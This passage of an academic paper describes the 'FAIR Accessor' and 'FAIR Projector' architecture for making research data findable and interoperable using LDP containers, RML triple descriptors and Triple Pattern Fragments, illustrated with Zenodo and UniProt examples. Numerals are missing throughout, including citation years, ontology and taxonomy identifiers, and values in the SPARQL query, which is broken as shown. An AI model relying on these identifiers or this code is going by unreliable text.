and interoperability between web services through rich ontologically- based annotations of the service interfaces, and biomoby (wilkinson et al., ) built on these mygrid annotations by further defining a novel ontology-based service request/response structure to guarantee data-level compatibility and thereby assist in workflow construction (withers et al., ). sadi (wilkinson, vandervalk & mccarthy, ), and sswap (gessler et al., ) used the emergent semantic web technologies of rdf and owl to enrich the machine-readability of web service interface definitions and the data being passed—sadi through defining service inputs and outputs as instances of owl classes, and sswap through passing data embedded in owl ‘graphs’ to assist both client and server in interpreting the meaning of the messages. in addition, two web service interoperability initiatives emerged from the world wide web consortium— owl-s (martin et al., ) and sawsdl (martin, paolucci & wagner, ), both of which used semantic annotations to enhance the ability of machines to understand web service interface definitions and operations. all of these service-oriented projects enjoyed success within the community that adopted their approach; however, the size of these adopting communities have, to date, been quite limited and are in some cases highly domain-specific. moreover, each of these solutions is focused on web service functionality, which represents only a small portion of the global data archive, where most data is published as static records. service-oriented approaches additionally require data publishers to have considerable coding expertise and access to a server in order to utilize the standard, which further limits their utility with respect to the ‘lay’ data publishers that make-up the majority of the scholarly community. as such, these and numerous other interoperability initiatives, spanning multiple decades, have yet to convincingly achieve a lightweight, broadly domain-applicable solution that works over a wide variety of static and dynamic source data resources, and can be implemented with minimal technical expertise. there are many stakeholders who would benefit from progress in this endeavour. scientists themselves, acting as both producers and consumers of these public and private data; public and private research-oriented agencies; journals and professional data publishers both ‘‘general purpose’’ and ‘‘special purpose’’; research funders who have paid for the underlying research to be conducted; data centres (e.g., the ebi (cook et al., ), and the sib (sib swiss institute of bioinformatics members, )) who curate and host these data on behalf of the research community; research infrastructures such as bbmri-eric (van ommen et al., ) and elixir (crosswell & thornton, ), and diverse others. all of these stakeholders have distinct needs with respect to the behaviours of the scholarly data infrastructure. scientists, for example, need to access research datasets in wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. order to initiate integrative analyses, while funding agencies and review panels may be more interested in the metadata associated with a data deposition—for example, the number of views or downloads, and the selected license. due to the diversity of stakeholders; the size, nature/format, and distribution of data assets; the need to support freedom-of-choice of all stakeholders; respect for privacy; acknowledgment of data ownership; and recognition of the limited resources available to both data producers and data hosts, we see this endeavour as one of the grand challenges of escience. in january , representatives of a range of stakeholders came together at the request of the netherlands escience centre and the dutch techcentre for life sciences (dtl) at the lorentz centre in leiden, the netherlands, to brainstorm and debate about how to further enhance infrastructures to support a data ecosystem for escience. from these discussions emerged the notion that the definition and widespread support of a minimal set of community-agreed guiding principles and practices could enable data providers and consumers—machines and humans alike—to more easily find, access, interoperate, and sensibly re-use the vast quantities of information being generated by contemporary data-intensive science. these principles and practices should enable a broad range of integrative and exploratory behaviours, and support a wide range of technology choices and implementations, just as the internet protocol (ip) provides a minimal layer that enables the creation of a vast array of data provision, consumption, and visualisation tools on the internet. the main outcome of the workshop was the definition of the so-called fair guiding principles aimed at publishing data in a format that is findable, accessible, interoperable and reusable by both machines and human users. the fair principles underwent a period of public discussion and elaboration, and were recently published (wilkinson et al., ). briefly, the principles state: findable—data should be identified using globally unique, resolvable, and persistent identifiers, and should include machine-actionable contextual information that can be indexed to support human and machine discovery of that data. accessible—identified data should be accessible, optimally by both humans and machines, using a clearly-defined protocol and, if necessary, with clearly-defined rules for authorization/authentication. interoperable—data becomes interoperable when it is machine-actionable, using shared vocabularies and/or ontologies, inside of a syntactically and semantically machine-accessible format. reusable—reusable data will first be compliant with the f, a, and i principles, but further, will be sufficiently well-described with, for example, contextual information, so it can be accurately linked or integrated, like-with-like, with other data sources. moreover, there should be sufficiently rich provenance information so reused data can be properly cited. while the principles describe the desired features that data publications should exhibit to encourage maximal, automated discovery and reuse, they provide little guidance regarding how to achieve these goals. this poses a problem when key organizations are already endorsing, or even requiring adherence to the fair principles. for example, a biological research group has conducted an experiment to examine polyadenylation site wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. usage in the pathogenic fungus magnaporthe oryzae, recording, by high-throughput ′-end sequencing, the preference of alternative polyadenylation site selection under a variety of growth conditions, and during infection of the host plant. the resulting data take the form of study-specific excel spreadsheets, bed alignment graphs, and pie charts of protein functional annotations. unlike genome or protein sequences and microarray outputs, there is no public curated repository for these types of data, yet the data are useful to other researchers, and should be (at a minimum) easily discovered and interpreted by reviewers or third-party research groups attempting to replicate their results. moreover, their funding agency, and their preferred scientific journal, both require that they publish their source data in an open public archive according to the fair principles. at this time, the commonly used general-purpose data archival resources in this domain do not explicitly provide support for fair, nor do they provide tooling or even guidance for how to use their archival facilities in a fair-compliant manner. as such, the biological research team, with little or no experience in formal data publishing, must nevertheless self-direct their data archival in a fair manner. we believe that this scenario will be extremely common throughout all domains of research, and thus this use-case was the initial focus for this interoperability infrastructure and fair data publication prototype. here we describe a novel interoperability architecture that combines three pre-existing web technologies to enhance the discovery, integration, and reuse of data in repositories that lack or have incompatible apis; data in formats that normally would not be considered interoperable such as excel spreadsheets and flat-files; or even data that would normally be considered interoperable, but do not use the desired vocabulary standards. we examine the extent to which the features of this architecture comply with the fair principles, and suggest that this might be considered a ‘‘reference implementation’’ for the fair principles, in particular as applied to non-interoperable data in any general- or special- purpose repository. we provide two exemplars of usage. the first is focused on a use-case similar to that presented above, where we use our proposed infrastructure to create a fair, self-archived scholarly deposit of biological data to the general-purpose zenodo repository. the second, more complex example has two objectives—first to use the infrastructure to improve transparency and fairness of metadata describing the inclusion criterion for a dataset, representing a subset of a special-purpose, curated resource (uniprot); and second, to show how even the already fair data within uniprot may be transformed to increase its fairness even more by making it interoperable with alternative ontologies and vocabularies, and more explicitly connecting it to citation information. finally, we place this work in the context of other initiatives and demonstrate that it is complementary to, rather than in competition with, other initiatives. methods implementation overview of technical decisions and their justification the world wide web consortium’s (w c) resource description framework (rdf) offers the ability to describe entities, their attributes, and their relationships with explicit wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. semantics in a standardized manner compatible with widely used web application formats such as json and xml. the linked data principles (berners-lee, ) mandate that data items and schema elements are identified by http-resolvable uris, so the http protocol can be used to obtain the data. within an rdf description, using shared public ontology terms for metadata annotations supports search and large scale integration. given all of these features, we opted to use rdf as the basis of this interoperability infrastructure, as it was designed to share data on the web. beyond this, there was a general feeling that any implementation that required a novel data discovery/sharing ‘‘platform’’, ‘‘bus’’, or api, was beyond the minimal design that we had committed to; it would require the invention of a technology that all participants in the data ecosystem would then be required to implement, and this was considered a non-starter. however, there needed to be some form of coalescence around the mechanism for finding and retrieving data. our initial target-community—that is, the biomedical sciences—have embraced lightweight http interfaces. we propose to continue this direction with an implementation based on rest (fielding & taylor, ), as several of the fair principles map convincingly onto the objectives of the rest architectural style for distributed hypermedia systems, such as having resolvable identifiers for all entities, and a common machine-accessible approach to discovering and retrieving different representations of those entities. the implementation we describe here is largely based on the http get method, and utilizes rich metadata and hypermedia controls. we use widely-accepted vocabularies not only to describe the data in an interoperable way, but also to describe its nature (e.g., the context of the experiment and how the data was processed) and how to access it. these choices help maximize uptake by our initial target-community, maximize interoperability between resources, and simplify construction of the wide (not pre-defined) range of client behaviours we intend to support. confidential and privacy-sensitive data was also an important consideration, and it was recognized early on that it must be possible, within our implementation, to identify and richly describe data and/or datasets without necessarily allowing direct access to them, or by allowing access through existing regulatory frameworks or security infrastructures. for example, many resources within the international rare disease research consortium participate in the rd connect platform (thompson et al., ) which has defined the ‘‘disease card’’—a metadata object that gives overall information about the individual disease registries, which is then incorporated into a ‘‘disease matrix’’. the disease matrix provides aggregate data about what disease variants are in the registry, how many individuals represent each disease, and other high-level descriptive data that allows, for example, researchers to determine if they should approach the registry to request full data access. finally, it was important that the data host/provider is not necessarily a participant in making their data interoperable—rather, the interoperability solution should be capable of adapting existing data with or without the source provider’s participation. this ensures that the interoperability objectives can be pursued for projects with limited resourcing, that ‘abandoned’ datasets may still participate in the interoperability framework, but most importantly, that those with the needs and the resources should adopt the responsibility for making their data-of-interest interoperable, even if it is not owned by them. this distributes wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the problem of migrating data to interoperable formats over the maximum number of stakeholders, and ensures that the most crucial resources—those with the most demand for interoperability—become the earliest targets for migration. with these considerations in mind, we were inspired by three existing technologies whose features were used in a novel combination to create an interoperability infrastructure for both data and metadata, that is intended to also addresses the full range of fair requirements. briefly, the selected technologies are: ( ) the w c’s linked data platform (speicher, arwe & malhotra, ). we generated a model for hierarchical dataset containers that is inspired by the concept of a linked data platform (ldp) container, and the ldp’s use of the data catalogue vocabulary (dcat, maali, erickson & archer, ) for describing datasets, data elements, and distributions of those data elements. we also adopt the dcat’s use of simple knowledge organization system (skos, miles & bechhofer, ) concept schemes as a way to ontologically describe the content of a dataset or data record. ( ) the rdf mappinglanguage (rml, dimou et al., ). rml allows us to describe one or more possible rdf representations for any given dataset, and do so in a manner that is, itself, fair: every sub-component of an rml model is findable, accessible, interoperable, and reusable. moreover, for many common semi-structured data, there are generic tools that utilize rml models to dynamically drive the transformation of data from these opaque representations into interoperable representations (https://github.com/rmlio/rml-mapper). ( ) triple pattern fragments (tpf—verborgh et al., ). a tpf interface is a rest web api to retrieve rdf data from data sources in any native format. a tpf server accepts urls that represent triple patterns [subject, predicate, object], where any of these three elements may be constant or variable, and returns rdf triples from its data source that match those patterns. such patterns can be used to obtain entire datasets, slices through datasets, or individual data points even down to a single triple (essentially a single cell in a spreadsheet table). instead of relying on a standardized contract between servers and clients, a tpf interface is self-describing such that automated clients can discover the interface and its data. we will now describe in detail how we have applied key features of these technologies, in combination, to provide a novel data discoverability architecture. we will later demonstrate that this combination of technologies also enables both metadata and data-level interoperability even between opaque objects such as flat-files, allowing the data within these objects to be queried in parallel with other data on the semantic web. metadata interoperability—the “fair accessor” and the linked data platform the linked data platform ‘‘defines a set of rules for http operations on web resources...to provide an architecture for read-write linked data on the web’’ (https://www.w .org/tr/ ldp/). all entities and concepts are identified by urls, with machine-readable metadata describing the function or purpose of each url and the nature of the resource that will be returned when that url is resolved. wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/rmlio/rml-mapper https://www.w .org/tr/ldp/ https://www.w .org/tr/ldp/ http://dx.doi.org/ . /peerj-cs. figure the two layers of the fair accessor. inspired by the ldp container, there are two resources in the fair accessor. the first resource is a container, which responds to an http get request by providing fair metadata about a composite research object, and optionally a list of urls representing metarecords that describe individual components within the collection. the metarecord resources resolve by http get to documents containing metadata about an individual data component and, optionally, a set of links structured as dcat distributions that lead to various representations of that data. within theldpspecification is theconcept ofan ldpcontainer. a basicimplementation of ldp containers involves two ‘‘kinds’’ of resources, as diagrammed in fig. . the first type of resource represents the container—a metadata document that describes the shared features of a collection of resources, and (optionally) the membership of that collection. this is analogous to, for example, a metadata document describing a data repository, where the repository itself has features (ownership, curation policy, etc.) that are independent from the individual data records within that repository (i.e., the members of the collection). the second type of resource describes a member of the contained collection and (optionally) provides ways to access the record itself. our implementation, which we refer to as the ‘‘fair accessor’’, utilizes the container concept described by the ldp, however, it does not require a full implementation of ldp, as we only require read functionality. in addition, other requirements of ldp would wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. have added complexity without notable benefit. our implementation, therefore, has two resource types based on the ldp container described above, with the following specific features: container resource: this is a composite research object (of any kind - repository, repository-record, database, dataset, data-slice, workflow, etc.). its representation could include scope or knowledge-domain covered, authorship/ownership of the object, latest update, version number, curation policy, and so forth. this metadata may or may not include urls representing metarecord resources (described below) that comprise the individual elements within the composite object. notably, the container url provides a resolvable identifier independent from the identifier of the dataset being described; in fact, the dataset may not have an identifier, as would be the case, for example, where the container represents a dynamically-generated data-slice. in addition, containers may be published by anyone—that is, the publisher of a container may be independent from the publisher of the research object it is describing. this enables one of the objectives of our interoperability layer implementation—that anyone can publish metadata about any research object, thus making those objects more fair. metarecord resource: this is a specific element within a collection (data point, record, study, service, etc.). its representation should include information regarding licensing and accessibility, access protocols, rich citation information, and other descriptive metadata. it also includes a reference to the container(s) of which it is a member (the container url). finally, the metarecord may include further urls that provide direct access to the data itself, with an explicit reference to the associated data format by its mime type (e.g., text/html, application/json, application/vnd.ms-excel, text/csv, etc.). this is achieved using constructs from the data catalogue vocabulary (dcat; w c, ), which defines the concept of a data ‘‘distribution’’, which includes metadata facets such as the data source url and its format. the lower part of fig. diagrams how multiple dcat distributions may be a part of a single metarecord. as with container resources, metarecords may be published by anyone, and independently of the original data publisher. in summary, the fair accessor shares commonalities with the linked data platform, but additionally recommends the inclusion of rich contextual metadata, based on the fair principles, that facilitate discovery and interoperability of repository and record- level information. the fair accessor is read-only, utilizing only http get together with widely-used semantic frameworks to guide both human and machine exploration. importantly, the lack of a novel api means that the information is accessible to generic web- crawling agents, and may also be processed if that agent ‘‘understands’’ the vocabularies used. thus, in simplistic terms, the accessor can be envisioned as a series of web pages, each containing metadata, and hyperlinks to more detailed metadata and/or data, where the metadata elements and relationships between the pages are explicitly explained to web crawlers. to help clarify this component prior to presenting the more complex components of our interoperability proposal, we will now explore our first use case—data self- archival. a simple fair accessor has been published online (rodriguez iglesias et al., ) in the zenodo general-purpose repository. the data self-archival in this citation wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. represents a scenario similar to the polyadenylation use-case described in the introduction section. in this case, the data describes the evolutionary conservation of components of the rna metabolism pathway in fungi as a series of heatmap images. the data deposit, includes a file ‘rname_accessor.rdf’ which acts as the container resource. this document includes metadata about the deposit (authorship, topic, etc.), together with a series of ‘contains’ relationships, referring to metarecords inside of the file ‘rname_accessor_metarecords.rdf’. each metarecord is about one of the heatmaps, and in addition to metadata about the image, includes a link to the associated image (datatype image/png) and a link to an rdf representation of the same information represented by that image (datatype application/rdf+xml). it should be noted that much of the content of those accessor files was created using a text editor, based on template rdf documents. the structure of these two documents are described in more detail in the results section, which includes a full walk-through of a more complex exemplar accessor. at the metadata level, therefore, this portion of the interoperability architecture provides a high degree of fairness by allowing machines to discover and interpret useful metadata, and link it with the associated data deposits, even in the case of a repository that provides no fair-support. nevertheless, these components do not significantly enhance the fairness and interoperability of the data itself, which was a key goal for this project. we will now describe the application of two recently-published web technologies—triple pattern fragments and rml—to the problem of data-level interoperability. we will show that these two technologies can be combined to provide an api-free common interface that may be used to serve, in a machine-readable way, fair data transformations (either from non-fair data, or transformations of fair data into novel ontological frameworks). we will also demonstrate how this fair data republishing layer can be integrated into the fair accessor to provide a machine-traversable path for incremental drill-down from high-level repository metadata all the way through to individual data points within a record, and back. data interoperability: discovery of compatible data through rml-based fair profiles in our approach to data-level interoperability, we first identified a number of desiderata that the solution should exhibit: . view-harmonization over dissimilar datatypes, allowing discovery of potentially integrable data within non-integrable formats. . support for a multitude of source data formats (xml, excel, csv, json, binary, etc.) . ‘‘cell-level’’ discovery and interoperability (referring to a ‘‘cell’’ in a spreadsheet) . modularity, such that a user can make interoperable only the data component of- interest to them . reusability, avoiding ‘‘one-solution-per-record’’ and minimizing effort/waste . must use standard technologies, and reuse existing vocabularies . should not require the participation of the data host (for public data). the approach we selected was based on the premise that data, in any format, could be metamodelled as a first step towards interoperability; i.e., the salient data-types and wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. relationships within an opaque data ‘‘blob’’ could be described in a machine-readable manner. the metamodels of two data sources could then be compared to determine if their contained data was, in principle, integrable. we referred to these metamodels as ‘‘fair profiles’’, and we further noted that we should support multiple metamodels of the same data, differing in structure or ontological/semantic framework, within a fair profile. for example, a data record containing blood pressure information might have a fair profile where this facet is modelled using both the snomed vocabulary and the icd vocabulary, since the data facet can be understood using either. we acknowledge that these meta-modelling concepts are not novel, and have been suggested by a variety of other projects such as dcat and dublin core (the dc application profile (heery & patel, )), and have been extensively described by the iso standard for ‘‘metadata registries’’. it was then necessary to select a modelling framework for fair profiles capable of representing arbitrary, and possibly redundant, semantic models. our investigation into relevant existing technologies and implementations revealed a relatively new, unofficial specification for a generic mapping language called ‘‘rdf mapping language’’ (rml dimou et al., ). rml is an extension of r rml (das, sundara & cyganiak, ), a w c recommendation for mapping relational databases to rdf, and is described as ‘‘a uniform mapping formalization for data in different format, which [enables] reuse and exchange between tools and applied data’’ (dimou et al., ). an rml map describes the triple structure (subject, predicate, object, abbreviated as [s,p,o]), the semantic types of the subject and object, and their constituent uri structures, that would result from a transformation of non-rdf data (of any kind) into rdf data. rml maps are modular documents where each component describes the schema for a single-resource-centric graph (i.e., a graph with all triples that share the same subject). the ‘‘object’’ position in each of these map modules may be mapped to a literal, or may be mapped to another rml module, thus allowing linkages between maps in much the same way that the object of an rdf triple may become the subject of another triple. rml modules therefore may then be assembled into a complete map representing both the structure and the semantics of an rdf representation of a data source. rml maps themselves take the form of rdf documents, and can be published on the web, discovered, and reused, via standard web technologies and protocols. rml therefore fulfils each of the desiderata for fair profiles, and as such, we selected this technology as the candidate for their implementation. comparing with related technologies, this portion of our interoperability prototype serves a similar purpose to the xml schema (xsd; fallside & walmsley, ) definitions within the output component of a web services description language (wsdl) document, but unlike xsd, is capable of describing the structure and semantics of rdf graphs. of particular interest to us was the modularity of rml—its ability to model individual triples. this speaks directly to our desiderata , where we do not wish to require (and should not expect) a modeller to invest the time and effort required to fully model every facet of a potentially very complex dataset. far more often, individuals will have an interest in only one or a few facets of a dataset. as such, we chose to utilize rml models at their wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure diagram of the structure of an exemplar triple descriptor representing a hypothetical record of a snp in a patient’s genome. in this descriptor, the subject will have the url structure http://example.org/patient/{id}, and the subject is of type patientrecord. the predicate is hasvariant, and the object will have url structure http://identifiers.org/dbsnp/{snp} with the rdf:type from the sequence ontology ‘‘ ’’ (which is the concept of a ‘‘snp’’). the two nodes shaded green are of the same ontological type, showing the iterative nature of rml, and how individual rml triple descriptors will be concatenated into full fair profiles. the three nodes shaded yellow are the nodes that define the subject type, predicate and object type of the triple being described. highest level of granularity—that is, we require a distinct rml model for each triple pattern (subject+type, predicate, object+type) of interest. we call these small rml models ’’triple descriptors’’. an exemplar triple descriptor is diagrammed in fig. . there may be many triple descriptors associated with a single data resource. moreover, multiple triple descriptors may model the same facet within that data resource, using different uri structures, subject/object semantic types, or predicates, thus acting as different ‘‘views’’ of that data facet. finally, then, the aggregation of all triple descriptors associated with a specific data resource produces a fair profile of that data. note that fair profiles are not necessarily comprehensive; however, by aggregating the efforts of all modellers, fair profiles model only the data facets that are most important to the community. fair profiles enable view harmonization over compatible but structurally non- integrable data, possibly in distinct repositories. the profiles of one data resource can wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. be compared to the profiles of another data resource to identify commonalities between their triple descriptors at the semantic level, even if the underlying data is semantically opaque and/or structurally distinct—a key step toward interoperability. fair profiles, therefore, have utility, independent of any actuated transformation of the underlying data, in that they facilitate compatible data discovery. moreover, with respect to desiderata , triple descriptors, and sometimes entire fair profiles, are rdf documents published on the web, and therefore may be reused to describe new data resources, anywhere on the web, that contain similar data elements, regardless of the native representation of that new resource, further simplifying the goal of data harmonization. data interoperability: data transformation with fair projectors and triple pattern fragments the ability to identify potentially integrable data within opaque file formats is, itself, a notable achievement compared to the status quo. nevertheless, beyond just discovery of relevant data, our interoperability layer aims to support and facilitate cross-resource data integration and query answering. this requires that the data is not only semantically described, but is also semantically and syntactically transformed into a common structure. having just presented a mechanism to describe the structure and semantics of data— triple descriptors in rml—what remains lacking is a way to retrieve data consistent with those triple descriptors. we require a means to expose transformed data without worsening the existing critical barrier to interoperability—opaque, non-machine-readable interfaces and api proliferation (verborgh & dumontier, ). what is required is a universally-applicable way of retrieving data generated by a (user-defined) data extraction or transformation process, that does not result in yet another api. the triple pattern fragments (tpf) specification (verborgh et al., ) defines a rest interface for publishing triples. the server receives http get calls on urls that contain a triple pattern [s,p,o], where any component of that pattern is either a constant or a variable. in response, a tpf server returns pages with all triples from its data source that match the incoming pattern. as such, any given triple pattern has a distinct url. we propose, therefore, to combine three elements—data transformed into rdf, which is described by triple descriptors, and served via tpf-compliant urls. we call this combination of technologies a ’’fair projector’’. a fair projector, therefore, is a web resource (i.e., something identified by a url) that is associated with both a particular data source, and a particular triple descriptor. calling http get on the url of the fair projector produces rdf triples from the data source that match the format defined by that projector’s triple descriptor. the originating data source behind a projector may be a database, a data transformation script, an analytical web service, another fair projector, or any other static or dynamic data-source. note that we do not include a transformation methodology in this proposal; however, we address this issue and provide suggestions in the discussion section. there may, of course, be multiple projectors associated with any given data source, serving a variety of triples representing different facets of that data. wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. linking the components: fair projectors and the fair accessor at this point, we have a means for requesting triples with a particular structure—tpf servers—and we have a means of describing the structure and semantics of those triples— triple descriptors. together with a source of rdf data, these define a fair projector. however, we still lack a formal mechanism for linking tpf-compliant urls with their associated triple descriptors, such that the discovery of a triple descriptor with the desired semantics for a particular data resource, also provides its associated projector url. we propose that this association can be accomplished, without defining any novel api or standard, if the output of a fair projector is considered a dcat distribution of a particular data source, and included within the metarecord of a fair accessor. the url of the projector, and its triple descriptor, become metadata facets of a new dcat:distribution element in the metarecord. this is diagrammed in fig. , where distribution_ and distribution_ include triple pattern fragment-formatted urls representing the fair projector, and the triple descriptor rml model describing the structure and semantics of the data returned by calling that projector. thus, all components of this interoperability system—from the top level repository metadata, to the individual data cell—are now associated with one another in a manner that allows mechanized data discovery, harmonization, and retrieval, including relevant citation information. no novel technology or api was required, thus allowing this rich combination of data and metadata to be explored using existing web tools and crawlers. results in the previous section, we provided the url to a simple exemplar fair accessor published on zenodo. to demonstrate the interoperability system in its entirety—including both the accessor and the projector components—we will now proceed through a second exemplar involving the special-purpose repository for protein sequence information, uniprot. in this example, we examine a fair accessor to a dataset, created through a database query, that consists of a specific ‘‘slice’’ of the protein records within the uniprot database—that is, the set of proteins in aspergillus nidulans fgsc a (ncbi taxonomy id ) that are annotated as being involved in mrna processing (gene ontology accession go: ). we first demonstrate the functionality of the two layers of the fair accessor in detail. we then demonstrate a fair projector, and show how its metadata integrates into the fair accessor. in this example, the projector modifies the ontological framework of the uniprot data such that the ontological terms used by uniprot are replaced by the terms specified in edam—an ontology of bioinformatics operations, datatypes, and formats (ison et al., ). we will demonstrate that this transformation is specified, in a machine-readable way, by the fair triple descriptor that accompanies each projector’s metadata. the two-step fair accessor the example fair accessor accesses a database of rdf hosted by uniprot, and issues the following query over that database (expressed in the standard rdf query language sparql): wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.ncbi.nlm.nih.gov/taxonomy/browser/wwwtax.cgi?mode=info&id= http://www.ebi.ac.uk/quickgo/gterm?id=go: http://dx.doi.org/ . /peerj-cs. figure integration of fair projectors into the fair accessor. resolving the metarecord resource returns a metadata document containing multiple dcat distributions for a given record, as in fig. . when a fair projector is available, additional dcat distributions are included in this metadata docu- ment. these distributions contain a url (purple text) representing a projector, and a triple descriptor that describes, in rml, the structure and semantics of the triple(s) that will be obtained from that projec- tor resource if it is resolved. these triple descriptors may be aggregated into fair profiles, based on the record that they are associated with (record r, in the figure) to give a full mapping of all available repre- sentations of the data present in record r. prefix up:<http://purl.uniprot.org/core/> prefix taxon:<http://purl.uniprot.org/taxonomy/> prefix rdf:<http://www.w .org/ / / -rdf-syntax-ns#> prefix go:<http://purl.obolibrary.org/obo/go_> select distinct ?id where { ?protein a up:protein ; up:organism taxon: ; up:classifiedwith/rdfs:subclassof go: . wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. bind(substr(str(?protein), ) as ?id) } accessor output is retrieved from the container resource url: http://linkeddata.systems/accessors/uniprotaccessor the result of calling get on the container resource url is visualized in fig. , where tabulator (berners-lee et al., ) is used to render the output as html for human-readability. of particular note are the following metadata elements: http://purl.org/dc/elements/ . /license https://creativecommons.org/licenses/by-nd/ . / http://purl.org/pav/authoredby http://orcid.org/ - - - x http://rdfs.org/ns/void#entities a http://purl.org/dc/dcmitype/dataset http://www.w .org/ns/ldp#basiccontainer http://www.w .org/ns/prov#collection http://www.w .org/ns/dcat#contactpoint http://biordf.org/datafairport/miscrdf/wilkinson.rdf http://www.w .org/ns/dcat#keyword ‘‘aspergillus nidulans’’, ‘‘aspergillus’’, ‘‘proteins’’, ‘‘rna processing’’; http://www.w .org/ns/dcat#theme http://linkeddata.systems/conceptschemes/rna_ processing_conceptscheme.rdf http://www.w .org/ns/ldp#contains http://linkeddata.systems/cgi-bin/accessors/ uniprotaccessor/c vil http://linkeddata.systems/cgi-bin/accessors/ uniprotaccessor/c v b ... • license information is provided as an html + rdfa document, following one of the primary standard license forms published by creative commons. this allows the license to be unambiguously interpreted by both machines and people prior to accessing any data elements, an important feature that will be discussed later. • authorship is provided by name, using the academic research project funding ontology (arpfo), but is also unambiguously provided by a link to the author’s orcid, using the provenance authoring and versioning (pav; ciccarese et al., ) ontology. • the repository descriptor is typed as being a dublin core dataset, a linked data platform container, and a provenance collection, allowing it to be interpreted by a variety of client agents, and conforming to several best-practices, such as the healthcare and life science dataset description guidelines (gray et al., ; dumontier et al., ). wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://purl.org/dc/elements/ . /license https://creativecommons.org/licenses/by-nd/ . / http://purl.org/pav/authoredby http://orcid.org/ - - - x http://rdfs.org/ns/void#entities http://purl.org/dc/dcmitype/dataset http://www.w .org/ns/ldp#basiccontainer http://www.w .org/ns/prov#collection http://www.w .org/ns/dcat#contactpoint http://biordf.org/datafairport/miscrdf/wilkinson.rdf http://www.w .org/ns/dcat#keyword http://www.w .org/ns/dcat#theme http://linkeddata.systems/conceptschemes/rna_processing_conceptscheme.rdf http://linkeddata.systems/conceptschemes/rna_processing_conceptscheme.rdf http://www.w .org/ns/ldp#contains http://linkeddata.systems/cgi-bin/accessors/uniprotaccessor/c vil http://linkeddata.systems/cgi-bin/accessors/uniprotaccessor/c vil http://linkeddata.systems/cgi-bin/accessors/uniprotaccessor/c v b http://linkeddata.systems/cgi-bin/accessors/uniprotaccessor/c v b http://dx.doi.org/ . /peerj-cs. figure a representative portion of the output from resolving the container resource of the fair accessor, rendered into html by the tabulator firefox plugin. the three columns show the label of the subject node of all rdf triples (left), the label of the uri in the predicate position of each triple (mid- dle), and the value of the object position (right), where blue text indicates that the value is a resource, and black text indicates that the value is a literal. • contact information is provided in a machine-readable manner via the friend of a friend (foaf) record of the author, and the dcat ontology ‘‘contactpoint’’ property. • human readable keywords, using dcat, are mirrored and/or enhanced by a machine- readable rdf document which is the value of the dcat ‘‘theme’’ property. this rdf document follows the structure determined by the simple knowledge organization system (skos) ontology, and lists the ontological terms that describe the repository for machine-processing. • finally, individual records within the dataset are represented as the value of the linked data platform ‘‘contains’’ property, and provided as a possibly paginated list of urls (a discussion of machine-actionable pagination will not be included here). these urls are the metarecord resource urls shown in fig. . following the flow in fig. , the next step in the fair accessor is to resolve a metarecord resource url. for clarity, we will first show the metadata document that is returned if wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure a representative (incomplete) portion of the output from resolving the metarecord resource of the fair accessor for record c v l (at http://linkeddata.systems/accessors/uniprotaccessor/ c v l ), rendered into html by the tabulator firefox plugin. the columns have the same meaning as in fig. . there are no fair projectors for that dataset. this will be similar to the document returned by calling a fair metarecord url in the zenodo use case discussed in the earlier methods section. calling http get on a metarecord resource url returns a document that include metadata elements and structure shown in fig. . note that fig. is not the complete metarecord; rather it has been edited to include only those elements relevant to the aspects of the interoperability infrastructure that have been discussed so far. more complete examples of the metarecord rdf, including the elements describing a projector, are described in figs. – . many properties in this metadata document are similar to those at the higher level of the fair accessor. notably, however, the primary topic of this document is the uniprot record, indicating a shift in the focus of the document from the provider of the accessor to the provider of the originating data. therefore, the values of these facets now reflect the authorship and contact information for that record. we do, recognize that metarecords are themselves scholarly works and should be properly cited. the metarecord includes the ‘‘in dataset’’ predicate, which refers back to the first level of the fair accessor, thus this provides one avenue for capturing the provenance information for the metarecord. if additional provenance detail is required, we propose (but no not describe further here) wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://linkeddata.systems/accessors/uniprotaccessor/c v l http://linkeddata.systems/accessors/uniprotaccessor/c v l http://dx.doi.org/ . /peerj-cs. @prefix dc: <http://purl.org/dc/elements/ . />. @prefix dcat: <http://www.w .org/ns/dcat#>. @prefix uni: <http://linkeddata.systems/accessors/uniprotaccessor/>. uni:c v l dcat:distribution <#distributiond f -c - e - c- d c dd>, <#distributiond f -c - e - c- d c dd>; <#distributiond f -c - e - c- d c dd> dc:format "text/html"; a dc:dataset, dcat:distribution; dcat:downloadurl <http://www.uniprot.org/uniprot/c v l .html>. <#distributiond f -c - e - c- d c dd> dc:format "application/rdf+xml"; a dc:dataset, void:dataset, dcat:distribution; dcat:downloadurl <http://www.uniprot.org/uniprot/c v l .rdf>. figure turtle representation of the subset of triples from the metarecord metadata pertaining to the two dcat distributions. each distribution specifies an available representation (media type), and a url from which that representation can be downloaded. figure a portion of the output from resolving the metarecord resource of the fair accessor for record c uzx , rendered into html by the tabulator firefox plugin. the columns have the same meaning as in fig. . comparing the structure of this document to that in fig. shows that there are now four values for the ‘‘distribution’’ predicate. an rdf and html representation, as in fig. , and two addi- tional distributions with urls conforming to the tpf design pattern (highlighted). wilkinson et al. ( ), peerj comput. sci., doi . /peerj-cs. / 